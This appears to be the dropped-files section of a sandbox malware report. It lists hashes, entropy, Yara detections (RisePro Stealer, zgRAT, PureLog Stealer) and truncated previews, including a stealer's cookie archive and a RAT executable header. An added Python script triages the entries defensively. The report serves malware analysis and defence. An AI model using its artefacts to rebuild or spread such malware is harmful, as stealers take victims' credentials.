                                                                                                                                                                                                                                        SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                        MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                        SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                        SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                        SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                        MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                        SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                        SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                        SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                        MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                        SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                        SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                        SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                        MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                        SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                        SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                        SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.698473196318807
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
                                                                                                                                                                                                                                        MD5:4D0D308F391353530363283961DF2C54
                                                                                                                                                                                                                                        SHA1:59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
                                                                                                                                                                                                                                        SHA-256:6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
                                                                                                                                                                                                                                        SHA-512:DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2898
                                                                                                                                                                                                                                        Entropy (8bit):7.7482996670963695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:99amL8DZI1sxTiRLUAkvdjzSKTkQUbhGOV5y8jujY+sGWFo8ukn3KJ69knOrzw:F8DQUi1UnvBWKGUOVE8jbFuk3KJR
                                                                                                                                                                                                                                        MD5:9CB23163405F7FD7A1ABB0A3E16D824D
                                                                                                                                                                                                                                        SHA1:883651C5AC503F7E0225E94401C3D712B20B47EF
                                                                                                                                                                                                                                        SHA-256:3742D90DA9E4062EC70BFABBB7E4BD387E73BD02A0F87E10B756AE8F0AA8B8BA
                                                                                                                                                                                                                                        SHA-512:32F2EA51B8F15B092FC55CF76A151DDB3EB3EB27EE3677985D7277960C3C0CEDDAE471C01815766BB310245D4C6C15904E8752EF905DBC45ED114F26A33CAE4F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK........L..X................Cookies\..PK........L..X..E.............Cookies\Chrome_Default.txt....P.@.5.....d...`|L2J1l.. .3."_..N.......q..b..=../c.;{.........4F8...0..Y.........Z}Y.g.<w3.f.W(....K.o..l...!*.......y.o;.F..5%.....|0MS.....J.,....../.o...8.H...,M.......;.....I!.z.W....j...e....fE.?.X....6...g...skL.K.85b.U.5...[/.<.h....C..|...C5"{..i.$...'..W).f.O.i..4.....L..Z..t.Z(].2.m.?..<....]........f..I3?.q..8U.6...8.N.y_#Vb...g.k?.Z1.!.3$.....\.%...PK........L..X...............information.txt.X.O.F.....a........<....K...j......9v.v .....:>..^...gfg~.m..m..c.H.8.6.|.E...../.....a...f...@.!J..)G.S>...c....c.h..B..H.p.%.E./F>.,.\.X...ok..B.".8....#B.......B.%....;.\...L0..>Q.K.k..4.....N.R.8ga.8F...m..<..2..........Q.>......'..<P..Nx...wz8..o.CR./=U..^.......8..R......<@..I<..pP..LHo..*..*........m./.4-O.h...,..1....F."G.;....&.z..t.~.......r.wu.......Dj.{v..2...4|A...m..P.w......f.m...:.M.....e..E.....U.....6K*...I....)z..j......E.;...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59721128
                                                                                                                                                                                                                                        Entropy (8bit):7.894297326209827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1572864:JLZ1CnPCEBSFRBOf4E/wGfVRMTytvAavLTr:VCnPCbFRBDgzVftvh
                                                                                                                                                                                                                                        MD5:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                        SHA1:0DD19EA3C791BB453AB530CA65CA12A680E67B65
                                                                                                                                                                                                                                        SHA-256:02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
                                                                                                                                                                                                                                        SHA-512:D7FAEF92E675064375B1D1CC13F326FED60673B32FAAED5C33EF5255890A72C031E9C5F1B86D2801774E2E47F9A5CD16C66C54398954F57336B07EEAA0E9E49E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: ditekSHen
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ;..........."...0.....V.......... ........@.. ..............................Tp....`....................................O.......|S...............)...`.........8............................................ ............... ..H............text....... ..................... ..`.rsrc...|S.......T.................@..@.reloc.......`......................@..B.......................H.......|...........q...d....P...........................................r...psR........~.....o^........*.s.........~....~D...%-.&~C.........s....%.D...o....*...0..K........r...p}.....(....o....o....o....}#....(.....r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r;..pr...pr...prA..p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p(
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59721128
                                                                                                                                                                                                                                        Entropy (8bit):7.894297326209827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1572864:JLZ1CnPCEBSFRBOf4E/wGfVRMTytvAavLTr:VCnPCbFRBDgzVftvh
                                                                                                                                                                                                                                        MD5:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                        SHA1:0DD19EA3C791BB453AB530CA65CA12A680E67B65
                                                                                                                                                                                                                                        SHA-256:02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
                                                                                                                                                                                                                                        SHA-512:D7FAEF92E675064375B1D1CC13F326FED60673B32FAAED5C33EF5255890A72C031E9C5F1B86D2801774E2E47F9A5CD16C66C54398954F57336B07EEAA0E9E49E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ;..........."...0.....V.......... ........@.. ..............................Tp....`....................................O.......|S...............)...`.........8............................................ ............... ..H............text....... ..................... ..`.rsrc...|S.......T.................@..@.reloc.......`......................@..B.......................H.......|...........q...d....P...........................................r...psR........~.....o^........*.s.........~....~D...%-.&~C.........s....%.D...o....*...0..K........r...p}.....(....o....o....o....}#....(.....r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r;..pr...pr...prA..p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p(
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):2.66122625626979
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Lion:Bn
                                                                                                                                                                                                                                        MD5:D8955F279D4EF1FDB640FD1F38A4F19E
                                                                                                                                                                                                                                        SHA1:5591E561F0130B6867589CEE4902DCBC85B1AB47
                                                                                                                                                                                                                                        SHA-256:C19B9FB1FC28FE46083EC9D8D8F8D0C239B7B1D472D239DF62931930AF4393F2
                                                                                                                                                                                                                                        SHA-512:032CA308BD227709AAA1212E7701717A08EFC71D8865D01A5482E772884BD42DED21B6AB7E0717C4BA50F54C8CB1A4589B6E5D42D3DD615C64B071A7956CE5DE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1713906798700
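The listing above is only useful once it is collapsed by hash: the 59 MB .NET assembly appears twice with identical MD5/SHA-1/SHA-256 values (one entry with Yara hits, one without), which means one artefact dropped to two paths, not two files, and the 13-byte text file is a millisecond Unix timestamp rather than configuration. The following Python is an added example, not part of the Joe Sandbox report, that parses the Key:Value entries as they appear on this page (record boundaries taken at each "Process:" line, since the per-file path header is missing from this extraction), groups them by SHA-256, reproduces the report's "Entropy (8bit)" figure for the 13-byte file, and decodes the timestamp. The sample input is constructed from lines on this page with the long SHA-512 and Preview fields trimmed; the function names are my own.

```python
import math
import re
from datetime import datetime, timezone

# Constructed sample: entries copied from the listing on this page with SHA-512/Preview
# trimmed and some rows dropped. A record starts at each "Process:" line.
SAMPLE = """\
Process:C:\\Windows\\System32\\svchost.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):59721128
Entropy (8bit):7.894297326209827
MD5:8E9C467EAC35B35DA1F586014F29C330
SHA-256:02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
Malicious:true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\\Users\\user\\AppData\\Local\\Temp\\iolo\\dm\\BIT1659.tmp, Author: Joe Security
• Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\\Users\\user\\AppData\\Local\\Temp\\iolo\\dm\\BIT1659.tmp, Author: ditekSHen
Antivirus:
• Antivirus: ReversingLabs, Detection: 12%
Preview:MZ......................@.......
Process:C:\\Windows\\System32\\svchost.exe
MD5:8E9C467EAC35B35DA1F586014F29C330
SHA-256:02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
Malicious:true
Preview:MZ......................@.......
Process:C:\\Users\\user\\AppData\\Local\\Temp\\1000009001\\2531414c80.exe
File Type:ASCII text, with no line terminators
Size (bytes):13
Entropy (8bit):2.66122625626979
MD5:D8955F279D4EF1FDB640FD1F38A4F19E
SHA-256:C19B9FB1FC28FE46083EC9D8D8F8D0C239B7B1D472D239DF62931930AF4393F2
Malicious:false
Preview:1713906798700
"""

YARA_RE = re.compile(r"Rule: (?P<rule>[^,]+), Description: (?P<desc>.+?), Source: (?P<src>.+?), Author: (?P<author>.+)$")


def parse_dropped_files(text):
    """Turn the Key:Value listing into one dict per dropped-file entry."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Process:"):                 # start of a new entry
            cur = {"yara": [], "sources": set()}
            records.append(cur)
            section = None
        if not line or cur is None:
            continue
        if line in ("Yara Hits:", "Antivirus:"):        # headers of the bullet lists
            section = line
            continue
        if line.startswith("•"):
            m = YARA_RE.search(line)
            if section == "Yara Hits:" and m:
                cur["yara"].append(m.group("rule"))
                cur["sources"].add(m.group("src"))     # path the rule fired on
            continue                                    # AV bullets are not needed here
        key, _, val = line.partition(":")               # values themselves may contain ':'
        cur[key] = val
    return records


def triage(records):
    """Collapse entries by SHA-256: one file dropped to several paths is a single artefact."""
    by_hash = {}
    for r in records:
        e = by_hash.setdefault(r.get("SHA-256", ""), {
            "count": 0, "droppers": set(), "yara": set(), "sources": set(),
            "malicious": False, "is_pe": r.get("Preview", "").startswith("MZ")})
        e["count"] += 1
        e["droppers"].add(r.get("Process", ""))
        e["yara"].update(r["yara"])
        e["sources"].update(r["sources"])
        e["malicious"] |= r.get("Malicious") == "true"
    return by_hash


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the quantity shown as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def decode_epoch_ms(text):
    """Read a 13-digit ASCII value as milliseconds since the Unix epoch (UTC)."""
    if not re.fullmatch(r"\d{13}", text.strip()):
        return None
    return datetime.fromtimestamp(int(text) / 1000, tz=timezone.utc)


if __name__ == "__main__":
    for sha, e in triage(parse_dropped_files(SAMPLE)).items():
        print(sha[:16], e["count"], "x", sorted(e["droppers"]), sorted(e["yara"]), e["malicious"])
    print(decode_epoch_ms("1713906798700"), round(shannon_entropy(b"1713906798700"), 6))
```

Run against the three sample entries this yields two artefacts: the assembly (count 2, dropped by svchost.exe, zgRAT rules attached, MZ preview) and the text file (count 1, decoding to 2024-04-23 21:13:18 UTC). The BIT1659.tmp name under a svchost.exe dropper follows the naming BITS uses for in-progress transfers; that is an inference from the path, not something the report states, so confirm it from the host's BITS job history before writing it up. Entropy of 7.89 on a 59 MB file is consistent with the large packed arrays the report's signatures flag, but by itself it does not distinguish packing from compressed resources.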
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):5242880
Entropy (8bit):0.03859996294213402
Encrypted:false
SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.121297215059106
Encrypted:false
SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:D87270D0039ED3A5A72E7082EA71E305
SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):51200
Entropy (8bit):0.8746135976761988
Encrypted:false
SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:9E68EA772705B5EC0C83C2A97BB26324
SHA1:243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):5242880
Entropy (8bit):0.03859996294213402
Encrypted:false
